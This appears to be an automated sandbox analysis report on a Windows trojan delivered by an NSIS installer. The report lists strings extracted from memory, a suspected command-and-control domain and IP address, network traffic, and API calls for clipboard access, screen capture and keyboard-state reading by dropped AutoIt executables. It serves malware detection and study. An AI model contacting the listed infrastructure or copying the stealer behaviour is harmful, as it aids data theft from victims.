Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.digicert.com0X
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.entrust.net02
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://ocsp.entrust.net03
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1602918760.000000000291C000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000000.1641628839.00000000004C5000.00000002.00000001.01000000.00000005.sdmp, EduSpark.pif, 00000012.00000000.1685519659.0000000000545000.00000002.00000001.01000000.00000008.sdmp, EduSpark.pif, 00000015.00000002.1831255863.0000000000545000.00000002.00000001.01000000.00000008.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000000.1948376082.00000000004C5000.00000002.00000001.01000000.00000005.sdmp, Buffer.pif, 0000001E.00000000.2607068219.00000000004C5000.00000002.00000001.01000000.00000005.sdmp, EduSpark.pif.10.dr, Kde.0.dr, Buffer.pif.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: http://www.entrust.net/rpa03
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: Buffer.pif, 0000001A.00000003.2071800006.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038718915.0000000003B66000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038718915.0000000003B66000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Buffer.pif, 0000001A.00000003.2038718915.0000000003B42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe, 00000000.00000003.1600318717.0000000002914000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000000A.00000003.1647753809.0000000004677000.00000004.00000800.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2005556644.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, EduSpark.pif.10.dr, Buffer.pif.1.dr, Tags.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe String found in binary or memory: https://www.entrust.net/rpa0
Source: Buffer.pif, 0000001A.00000003.2074373952.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2074257595.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Tags.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: Buffer.pif, 0000001A.00000003.2039372668.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039243335.0000000001822000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2039171332.0000000003B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Buffer.pif, 0000001A.00000003.2073423790.0000000003C6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Buffer.pif, 0000001A.00000003.2159826380.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159945485.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160533803.0000000001759000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160654760.00000000017C9000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159883618.0000000001759000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/
Source: Buffer.pif, 0000001A.00000003.2159513394.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160741640.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159964966.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159513394.00000000017CC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160675221.00000000017D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/api
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/api-aF
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/apil
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/h
Source: Buffer.pif, 0000001A.00000003.2159826380.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159945485.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160654760.00000000017C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/pi
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/pic
Source: Buffer.pif, 0000001A.00000003.2159826380.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2159945485.00000000017C7000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000002.2160654760.00000000017C9000.00000004.00000020.00020000.00000000.sdmp, Buffer.pif, 0000001A.00000003.2132311001.00000000017BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/pil
Source: Buffer.pif, 0000001A.00000003.2038474366.000000000176D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zippyfinickysofwps.shop/piu
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.39.216:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSIS.Agent.20411.3944.exe Code function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405582
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 18_2_004EF7C7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_0046F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 26_2_0046F7C7
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004EF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 18_2_004EF55C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_01631351 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject, 26_2_01631351
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004DA635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 18_2_004DA635
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_00509FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 18_2_00509FD2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\Buffer.pif Code function: 26_2_00489FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 26_2_00489FD2

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.js"
Source: C:\Users\user\AppData\Local\EdTech Spark Solutions\EduSpark.pif Code function: 18_2_004E4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 18_2_004E4763
